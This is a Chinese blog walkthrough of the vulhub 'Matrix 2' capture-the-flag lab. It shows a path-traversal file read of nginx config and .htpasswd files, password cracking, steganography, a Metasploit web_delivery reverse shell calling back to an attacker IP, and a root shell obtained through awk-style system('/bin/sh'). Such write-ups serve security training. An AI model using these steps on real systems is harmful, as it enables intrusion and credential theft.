vulhub-Matrix 2

已于 2024-05-14 23:23:00 修改
阅读量156 收藏 4
点赞数 9
文章标签: 网络安全
于 2024-05-14 23:22:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2201_75378806/article/details/138874441
版权

端口扫描

80,1337,12320,12321,12322....

多个端口运行在http

没啥东西

在nmap扫描时12322有爆出目录/robots.txt看看

file_view.php访问后是空白页面

fuzz一下参数(上一章节有),是file

试试文件包含

获得两个用户n30Neo

是ngnix的服务读取敏感文件看看

file = ../../../../../etc/nginx/sites-available/default

这里面可以看到密码储存在 **/var/www/p4ss/.htpasswd

查看一下它得到**Tr1n17y 的用户的密码哈希值,用john破解

用户名:Tr1n17y 密码:admin

登入上面的页面

查看页面源码

查看一下源码

有个隐藏图片

看一下

用 steghide ”的工具来查找图像中是否隐藏有任何文件

用它登入12320端口ssh

use exploit/multi/script/web_delivery

set lhost 192.168.1.107

set srvhost 192.168.1.107

exploit

创建一个python漏洞脚本,反弹到msf上

ls -lhai

阅读一下bash_history

morpheus 'BEGIN {system("/bin/sh")}' ```sh and got the root flag..

morpheus 'BEGIN {system("/bin/sh")}执行试试,成功提权root

kikifofo
关注
WHQL认证的必要性
germany86的博客
07-22 1595
WHQL认证的必要性 设备生产商要知道自己生产设备是否能在windows上正常,稳定的运行,就需要做微软发布的硬件测试标准-微软徽标认证,又称WHQL认证。硬件设备要能在windows运行,就需要驱动驱动分二类:一类是windows自带的驱动就能满足您的设备工作了,一类是你需要自己开发驱动能满足你设备才能运行的驱动。设备能否在Windows上稳定的运行,就需要通过WHQL认证,来让你知道您设计的硬件是否能兼容Windows自带的驱动,在Windows上运行,或者是您设计的硬件和驱动,是否能在Window
windows驱动数字签名WHQL完整流程 | WHQL认证环境部署以及HLK测试
西京刀客
06-24 5314
由于受微软信任的Digicert,Entrust,Sectigo,Thawte等第三方驱动代码签名交叉证书已全部过期,微软不再接受EV代码签名证书为驱动程序进行内核数字签名。取而代之的是需要对驱动程序做WHQL认证微软徽标认证)。 WHQL认证,也叫Windows徽标认证,由美国微软公司(Microsoft)设立的认证Windows微软徽标认证的全名为Windows Hardware Quality Labs(WHQL)。......
Windows 10 不同版本WHQL认证驱动数字签名兼容问题.docx
03-31
Windows 10微软公司发行以来不断的推出新的版本,尤其是近期更新更是频繁。微软不断的更新本件非常好的事,修正发现的Bug然后推出更为稳定的Windows 操作系统。文章详细的描述了不同版本Windows 10 WHQL认证兼容的问题,并且给出了解决方案
主板中的Win10/win8.1 WHQL支持是否要开启
Anxinenen的博客
04-07 1万+
在新式的电脑主板上会有Windows 10/8.1 WHQL支持开启的选项,这个选项的开启和关闭分别代表什么意义呢? 这其实还要从UEFI和Legacy两种不同BIOS的说起. Legacy是传统的BIOS,uefi启动是一种新的主板引导项,它被看做是bios的继任者。我们知道传统的BIOS开机是有一个硬件自检的过程,因此相比新式UEFI BIOS 开机速度来说会慢一些。UEFI模式启动不但更快捷...
Windows 10版本驱动数字签名更新的必要性
Anxinenen的博客
07-21 548
Windows 10版本驱动数字签名更新的必要性 最近我们在接到一位客户的反馈,之前做的windows 10 WHQL认证获得的驱动数字签名在新版本Windows 10 20H2无法安装,提示是数字签名无法验证。而之前其他的Windows 10版本一直都是能正常使用的。 事情让人感到蹊跷,我们调出了这位客户之前做WHQL认证驱动存档。他们是在2018年3月份做的认证,当时测试的系统版本Windows 10 RS2也就是1704版本。我们查看了当时微软对catalog文件签名所用的算法是Sha1RS
没有过WHQL认证驱动win7 上安装的方法
01-27
为了使驱动程序在长期使用中保持有效,通常需要找到经过WHQL认证驱动,或者在系统中进行其他设置以永久禁用驱动程序签名检查,但这可能会增加系统风险,如遇到兼容性问题和安全性问题。 此外,安装未经WHQL认证的...
FTDI CDM v2.12.04 WHQL认证驱动支持Windows 10
描述中的"可支持 Windows 10"意味着该驱动程序版本已经通过了微软WHQLWindows Hardware Quality Labs)认证,并且兼容Windows 10操作系统。WHQL测试是微软的一个认证过程,确保第三方硬件产品能够与Windows操作...
【操作系统兼容性】:揭秘不同Windows版本驱动签名的兼容性差异
![【操作系统兼容性】:揭秘不同Windows版本驱动签名的兼容性差异]...本文还提出了解决驱动签名兼容性问题的策略和方法,最后展望了未来操作系统兼容性的发
不兼容的签名实现,
weixin_30673611的博客
07-04 403
sayHello(str:string=null) 接口也要写成 sayHello(str:string=null); 关键问题在于你要给函数参与默认值null,接口也要写上赋值 转载于:https://www.cnblogs.com/jiahuafu/archive/2009/07/04/1516862.html...
搭建windows WHLK/WHCK/WHQL测试平台,获取微软数字签名
04-20
本文介绍如何为windows驱动程序开发搭建WHLK测试平台,进行WHLK测试,以获取微软数字签名。WHLK/WHCK/WHQL是同一个东西,历史上有过不同的名称而已。
WHQL安装使用文档
02-27
WHQLWindows Hardware Quality Lab.的简称, 翻译成中文是windows系统硬件质量实验室。 实验室主要执行windows徽标计划,检验硬件产品和驱动程序在windows系统下的兼容性和稳定性。
驱动兼容_「图」英特尔DCH驱动新版发布:重点修复Windows 10兼容性问题
weixin_35724881的博客
12-25 730
英特尔近日推出了适用于Windows 10系统的新版DCH图形驱动程序,将版本号提高到26.20.100.7323。该版本最大的亮点就是引入了对Windows 10 November 2019(Version 1909)功能更新的支持。Windows 10 November 2019更新预计将在下个月向公众发布,可以在搭载Intel DCH驱动程序26.20.100.7323或者更高版本的PC上运...
Windows HLK
goodcrony的博客
08-01 1万+
适用于 Windows 10Windows Hardware Lab Kit (Windows HLK) 是 Windows 徽标工具包 (WLK) 和 Windows 硬件认证工具包 (Windows HCK) 的进化版。它可帮助公司交付与 Windows 兼容且能在 Windows 10 桌面版(家庭版、专业版和企业版)以及 Windows Server 2016 上可靠运行的系统、软件和硬件产品。就像以前的版本那样,适用于 Windows 10Windows HLK 中的测试可让你充分利用
安卓APP应用签名不一致无法安装的解决方案
热门推荐
Learning_LB的博客
03-31 25万+
教程链接https://mp.weixin.qq.com/s/tH_6ndQkYeWwIIegNPpOeQ最近安装公司开发的app时,突然提示应用签名冲突,无法安装程序,请先卸载旧版本后安装,这时候怎么办呢, 按照提示做,然鹅,当我卸载了所有开发测试版,以及正式版的app后之后依然安装不上,那肿么办呢,分析原因,想办法解决,哈哈。安装app时 ,提示签名冲突一般是以下几个原因导致的:原因1...
用插件登录wow为什么显示服务器不兼容,《魔兽世界》显示游戏设备驱动不兼容的解决方法...
weixin_33657499的博客
08-12 7042
近日有《魔兽世界》的玩家反映,在客户端更新升级后登陆游戏设备,其显示驱动不兼容,这是由于显卡驱动过期导致,若不选择更新,亦可通过点击确定按钮跳过该提示继续游戏,但每次登录都会出现,这里给大家分享下《魔兽世界》登陆显示游戏设备驱动不兼容的解决方法。请各位玩家参照以下步骤来更新显卡驱动:1、按下Windows键 + R。(Windows键一般情况下位于左Alt键的左方。)2、输入DxDiag并点击确定...
如何取得Windows驱动程序的数字签名
Sunny285067545的专栏
08-02 4845
Windows 2000操作系统开始,用户会发现在为爱机安装某些新硬件的驱动程序时,会弹出一个没有数字签名的警告对话框,这个对话框让用户看起来很不爽,它说这个刚买回来的新硬件有可能是不可靠的,有可能影响整机的稳定性。当然,通常购自于名牌大厂的硬件就不会有这样的提示,这是怎么一回
WHQL认证(徽标认证)步骤介绍
germany86的博客
01-16 8984
WHQLWindows Hardware Quality Labs的简称,意思为“Windows操作系统硬件质量实验室”,其微软徽标认证计划( Microsoft Logo Program )使得各种软件、硬件、系统和 XML服务等与 Windows 操作系统兼容和并保证产品在Windows系统上的稳定性。 此认证计划为生产商与终端消费者提供了一套可信赖的认证模式,以确保其系统或周边配备能够与系...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值